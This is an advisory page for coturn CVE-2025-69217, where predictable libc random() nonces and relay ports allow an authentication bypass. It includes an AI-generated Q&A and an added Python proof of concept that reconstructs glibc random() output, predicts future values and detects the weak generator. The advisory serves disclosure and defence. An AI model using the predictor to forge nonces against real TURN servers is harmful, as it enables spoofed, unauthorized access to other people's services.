CVE-2025-69217
Predictable Nonces and Ports in coturn Enable Authentication Bypass
Publication date: 2025-12-30
Last updated on: 2025-12-30
Assigner: GitHub, Inc.
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| coturn | coturn | 4.6.2r5 |
| coturn | coturn | 4.7.0-r4 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-338 | The product uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG's algorithm is not cryptographically strong. |
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The provided resources do not contain information regarding the impact of this vulnerability on compliance with common standards and regulations such as GDPR or HIPAA.
Can you explain this vulnerability to me?
This vulnerability affects coturn versions 4.6.2r5 through 4.7.0-r4. The random number generator used for authentication nonces and for relay-port randomization is weak: instead of OpenSSL's cryptographically secure RAND_bytes, the server draws values from libc's random(), a non-cryptographic generator whose future output can be computed from its earlier output. By collecting about 50 sequential nonces through unauthenticated allocation requests, an attacker can reconstruct the generator's state and predict the nonces the server will issue next. A client normally learns the nonce only from the server's challenge response, so an attacker who can predict it can send correctly formed authenticated messages from a spoofed source IP address without ever receiving a response. Relay-port selection is deterministic in the same way, so the attacker can also determine current and future relay ports.
How can this vulnerability impact me?
The vulnerability allows attackers to predict authentication nonces and relay ports, so they can spoof source IP addresses and send authenticated messages without needing the server's responses. This can lead to unauthorized access to or misuse of the TURN/STUN server, potentially disrupting service or letting attackers bypass security controls that rely on nonce unpredictability and port randomization.
What immediate steps should I take to mitigate this vulnerability?
Update coturn to a version that includes the fix for this vulnerability, specifically a version that contains commit 11fc465f4bba70bb0ad8aae17d6c4a63a29917d9 or later.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
The definitive check is the installed version: confirm whether the running coturn build includes the fix named in the mitigation above. On the wire, the weakness shows up as nonces and relay ports that follow the server's libc random() stream instead of being unpredictable. To test a server directly, send a series of unauthenticated allocation requests (for example with turnutils_uclient, which ships with coturn, or a custom STUN/TURN script), log the nonce returned in each challenge, and check the sequence for structure. For glibc's random() the structure is specific: once the nonces are decoded back to the generator's 31-bit outputs, every output from the 32nd onward equals the sum of the outputs 3 and 31 positions earlier modulo 2^31, or that sum plus one, and a captured stream that satisfies this relation throughout is coming from the weak generator. Relay ports allocated to successive sessions can be checked the same way for predictable increments or patterns. No specific detection commands are provided in the resources. [2]
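The state reconstruction from the explanation above and the sequence check from the detection answer, as an added example that is not coturn's code and not part of the original page: a pure-Python reimplementation of glibc's random() (the TYPE_3 additive lagged-Fibonacci generator Linux libc uses by default), a predictor that from 31 or more consecutive outputs names the at most two values the next output can take without knowing the seed, and a checker that flags a captured stream that fits that relation. The function names, the seed, and the assumption that each observed value is one raw 31-bit random() output in order are constructed for this example; how coturn packs random() output into the nonce string and into relay-port selection is not described on this page.

```python
"""Added example (not coturn's code): predicting glibc random() from observed output."""

MASK32 = 0xFFFFFFFF
MASK31 = 0x7FFFFFFF
WARMUP = 310  # glibc srandom() discards 10 * 31 outputs before the first random()


def glibc_random(seed, count):
    """Return `count` consecutive outputs of glibc random() after srandom(seed).

    Reimplements glibc's default TYPE_3 generator: 31 state words filled by a
    Park-Miller LCG, 310 warm-up steps, then r[i] = r[i-31] + r[i-3] mod 2^32
    with the 31-bit value r[i] >> 1 returned to the caller.
    """
    if seed == 0:               # glibc substitutes 1 for a zero seed
        seed = 1
    seed &= MASK32
    if seed & 0x80000000:       # glibc stores the seed as a signed int32
        seed -= 1 << 32
    r = [seed]
    for _ in range(30):
        r.append((16807 * r[-1]) % 2147483647)
    r.extend(r[:3])             # front and rear pointers start 3 words apart
    outputs = []
    for i in range(34, 34 + WARMUP + count):
        r.append((r[i - 31] + r[i - 3]) & MASK32)
        if i >= 34 + WARMUP:
            outputs.append(r[i] >> 1)
    return outputs


def predict_candidates(observed):
    """Two possible next outputs given at least 31 consecutive earlier outputs.

    random() returns r[i] >> 1, so the low bit of every state word is hidden.
    The two hidden bits can carry into the returned value, which is therefore
    (o[i-31] + o[i-3]) mod 2^31 or that plus one; the seed is never needed.
    """
    if len(observed) < 31:
        raise ValueError("need at least 31 consecutive outputs")
    base = (observed[-31] + observed[-3]) & MASK31
    return base, (base + 1) & MASK31


def looks_like_glibc_random(values):
    """Detection check: does every value from the 32nd on obey the recurrence?

    A genuinely random 31-bit stream passes one position with probability 2^-30,
    so a capture of a few dozen values that passes everywhere is decisive.
    """
    if len(values) < 32:
        return False
    return all(values[i] in predict_candidates(values[:i])
               for i in range(31, len(values)))


def simulate_attack(seed=0x5EED, observed=50, to_predict=20):
    """Capture `observed` outputs, then predict each later one before seeing it.

    Returns (hits, to_predict), where hits counts predictions in which the true
    value was one of the two candidates. The attacker keeps its window in sync
    by continuing to collect outputs through its own, unspoofed requests.
    The seed is a constructed value; a real server's seed is unknown and unneeded.
    """
    stream = glibc_random(seed, observed + to_predict)
    window = list(stream[:observed])
    hits = 0
    for actual in stream[observed:]:
        if actual in predict_candidates(window):
            hits += 1
        window.append(actual)
    return hits, to_predict


if __name__ == "__main__":
    print("srandom(1) outputs:", glibc_random(1, 5))
    print("predicted/total:", simulate_attack())
    print("glibc stream detected:", looks_like_glibc_random(glibc_random(42, 50)))
```

The recurrence needs only 31 consecutive outputs to start predicting; the remaining observations in a capture of about 50 are what let the checker confirm that the stream really is glibc's generator before any prediction is acted on. Each prediction leaves a one-bit ambiguity, which is why the predictor returns two candidates rather than one value: an attacker simply tries both.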